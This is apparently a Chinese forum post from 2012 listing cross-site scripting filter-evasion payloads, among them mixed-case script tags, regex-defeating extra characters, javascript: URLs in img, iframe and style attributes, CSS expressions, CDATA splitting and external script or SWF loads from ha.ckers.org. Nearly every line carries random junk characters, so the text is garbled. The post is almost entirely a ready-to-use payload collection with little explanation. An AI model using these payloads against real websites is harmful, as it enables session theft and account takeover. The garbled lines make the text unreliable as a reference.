1. 改变字符大小写. @9 |' ?2 f9 m8 Y" R, u& @7 u
, c/ C+ U& R' j9 z* e4 ]
% i, ` `' u1 w/ P! U F' i6 B/ n+ y: o
<sCript>alert(‘d’)</scRipT>
/ s k- V( Q8 C% y m" d- s7 Z! J- ]+ d: \" s
2. 利用多加一些其它字符来规避Regular Expression的检查
. o) @7 |, A0 W, Y& ?
: M2 i% ^0 v, S, u. ~- M4 Q <<script>alert(‘c’)//<</script>" l$ [6 E' _2 u! n, r
s4 {7 ]+ {% R' I. T+ u <SCRIPT a=">" SRC="t.js"></SCRIPT>0 F" H- G4 G. e4 \+ p- |! d/ f
; k1 B ?. }/ V. n2 ?2 k <SCRIPT =">" SRC="t.js"></SCRIPT>
/ k% |9 F* U- Q8 G6 `) O
% [0 c3 }3 V+ ]7 c' |! a! W! { <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
; E2 ]; Z8 e4 S6 \, C; M4 h. G/ y3 s; q6 H! e
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>0 s5 y% E& T+ `1 l
' D+ R/ [! Y1 W3 J" C
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
# @. Y4 u L7 Z+ T, _8 ?
7 v7 K: m9 m9 S9 ^; W. r <SCRIPT a=">’>" SRC="t.js"></SCRIPT>$ a. ^( c( [$ |2 V2 d2 S- j
/ A& j" X' j+ ]+ V/ p, z( b3. 以其它扩展名取代.js& c5 y/ \+ {6 Q' c
, j% T6 q" ]+ i6 H <script src="bad.jpg"></script>
1 R' a, ~0 {4 ~8 W; j5 X5 r0 b j7 i7 H5 _* e0 U7 _
4. 将Javascript写在CSS档里; r/ f# J0 E- |
& s# O+ i( | ^1 d) I <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">8 `3 y( M% Y) a7 L
0 J# J6 \$ {- q7 B' j. j Y example:2 C' s, w" ~0 ]8 f5 I# l
, h! i7 b9 H; Y- N, ^1 c( w
body {
) B2 l4 E) J- O9 ]
6 ~/ Q' ~8 V$ I* s3 R background-image: url(‘javascript:alert("XSS");’)
8 H) P5 A& c5 b. `9 r
. x N" x1 W9 H4 M/ ]; @1 A }+ L* _8 O# R5 S' x( s
9 E8 _4 A3 |( c K6 B2 g5. 在script的tag里加入一些其它字符
; |& T/ R2 L% T% v1 Y* A: ?
+ f+ n) v7 r& `1 M4 j( [6 f <SCRIPT/SRC="t.js"></SCRIPT>
3 j: E+ l% s8 C2 P
) L. c9 }+ x$ O3 v$ z ^ <SCRIPT/anyword SRC="t.js"></SCRIPT>
2 G T4 p& X) u7 ~ N. j1 Y( C5 Q' c
6. 使用tab或是new line来规避/ b: y7 z9 g+ c1 c w2 y6 u
) J$ T9 R7 ^: m4 O/ o9 c
<img src="jav ascr ipt:alert(‘XSS3′)">
0 S3 E! F9 g" v+ b# s) I7 W |4 ~# m* O3 ]1 W! q( ^/ g
<img src="jav ascr ipt:alert(‘XSS3′)"># ~4 F' n {. i3 y$ P- s
0 ~+ V- }" a& J: |4 Y( W <IMG SRC="jav ascript:alert(‘XSS’);">3 ]& t5 C6 g8 j) h- _
) `0 Q( R' i3 f+ w0 q ]* q8 d -> tag
4 S& s% r! C k m& V' Y# l: L: @% w! f$ Q) L$ o& J" G( W
-> new line
: \( p) F' t4 G \
! Z' s( a$ K# O* i; f7. 使用"\"来规避6 g8 l% R7 S% x: c
1 R6 K9 l8 P7 J+ J1 ?0 C <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
+ z* @, |6 L& a L" S/ v. X5 ^
4 i# @3 S- `) U W- m: l7 A" Q <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’># G9 y1 p$ H5 }$ b; O. a7 d
" k( F8 S; a' q7 B7 [& |+ B
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">& s z7 R0 ]. b( E
# K/ s( l# e; F5 G2 C* t+ L" ]/ L <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"># _1 u4 [- _3 N: t5 D( r# r
7 K% C1 s, F3 n6 E9 B0 a" f
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>7 o: R# z; A. G% n7 q/ Y& F
5 S9 G$ t7 E8 e4 t# w( G: }; N+ Q) t8. 使用Hex encode来规避(也可能会把";"拿掉)) m8 \( R' e( c8 d
% @. S7 k/ @( a6 T6 H/ ]4 Z3 F( u <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">0 B" ?5 D# P/ a5 y5 {
0 F3 B* z3 E: b! Q8 i7 T# E
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
" I; U& J+ M' Q0 g
% j f. F8 z8 ^) M6 ~- a7 A <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">% T8 K l6 `7 u9 s$ y# l: b
. J! q+ o2 c& k, Y
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">( G1 \; @. v" u1 q' |+ D8 A
2 }( }: d- ?+ B4 |! }8 d8 \
9. script in HTML tag% ^& h7 O* ]5 w
" r5 U S0 Q) z
<body onload=」alert(‘onload’)」>
# S1 b i- D$ }" ?& h8 @+ |+ e/ {
" F; X1 c3 G1 V4 |5 k3 o onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
2 P8 J0 k" `4 n% b' z" b& H: F! O- _: P3 p3 Q# e+ p" [3 ]2 `
10. 在swf里含有xss的code
$ e7 I5 |. H# X; d2 I
, a1 l4 s" j( M5 ~ G# ? <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>! O' ]' n: q$ G1 F$ a) p/ `
4 I0 Q+ w% b4 z" Z0 L
11. 利用CDATA将xss的code拆开,再组合起来。$ V J8 a) F7 M
8 b6 [0 T4 `/ f) u
<XML ID=I><X><C>- M+ s5 s+ b5 @8 ]. j8 E
, Q7 k4 a& n6 v" c4 D9 v6 [ <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- d. Q7 S: t9 R2 E* ^- f4 @$ [ T5 A) W# H4 f
</C></X>0 E, T0 p& F, |+ e( q
6 o' c- r& v5 i* [ </xml> Q& B2 U* V% K" o5 P
* k6 f; x. o& r9 W" X W
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>: V6 U% w' }0 i( |- J* e
7 b' C9 c% \; x0 h. l
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>: j; p1 Y- Q5 k- L
. W9 S- H; O0 ^$ w" s3 W% u
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
5 [$ y( y, O/ n$ }' n9 G
8 n5 X$ k N# g- V12. 利用HTML+TIME。' r- X& u; m) Y. t2 C1 I, j2 Y: ^
/ Y; a3 w" B7 l9 m
<HTML><BODY>
! I1 ] V! V; r
. N `1 H6 `: Q! a* N$ }" C: T <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
3 Z9 b( t* f2 f* x% G7 N8 ?7 P/ y4 D$ `/ o
<?import namespace="t" implementation="#default#time2"> e9 k( Q2 P5 K3 q0 B
1 A9 _6 z0 z1 {5 M& e6 H <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
2 b3 J9 _, N, ~: }( w" E _% B) t% a
</BODY></HTML>
; i2 o: p- H% h% S2 j* C
# m2 I7 y5 h4 T8 n9 G, N7 f13. 透过META写入Cookie。7 |& l- q, T. k
. m" d& b% j% ~2 Z) z% }# I* U* c; D- A
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">' ]7 Y3 {# \3 J. j4 M2 @
8 B9 a& b/ c) }7 R+ N6 H14. javascript in src , href , url$ U3 q- a- T `$ p" x
+ s& P1 G0 Q+ j9 ~3 P
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
7 e- Y, v# F! L# q5 {
2 Z; r( c }. a4 T2 l <img src="javascript:alert(‘XSS3′)">
9 s |' R9 `: j. N
- W1 |$ v6 |9 ~1 r6 K- a2 z<IMG DYNSRC="javascript:alert(‘XSS20′)">
+ k+ V3 R1 M" G
9 o8 [+ G3 M2 N9 Y& \4 E <IMG LOWSRC="javascript:alert(‘XSS21′)">
6 ? E$ s' b9 j* U
5 f( F; _7 c2 K( T g <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);"> X8 B$ V" ~7 z* F* j
; v3 s4 H% I+ R
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
6 [- k5 T: E/ i& O7 K9 \3 x# R8 l f5 Z. T- B
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
: \( d, x: L" s9 g6 u# I
" a6 q! i6 ^" t8 G <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">+ h$ [- N$ o* v7 X9 I4 W: ]. f5 f' h
( c1 t' f$ @; i. R
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}; r& e m" m( f# u8 |5 I% p
I, v9 N" b1 J9 R' h </STYLE><A CLASS=XSS></A>
8 r/ o" ]( X6 E3 A# p: l2 ~9 E: n2 V9 {5 x+ S0 O! y% c& \
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>8 i. W6 |8 `. B2 f5 O
% \) `5 ~& J/ C# a |
发表于 2012-12-31 09:59:28
收藏
支持
反对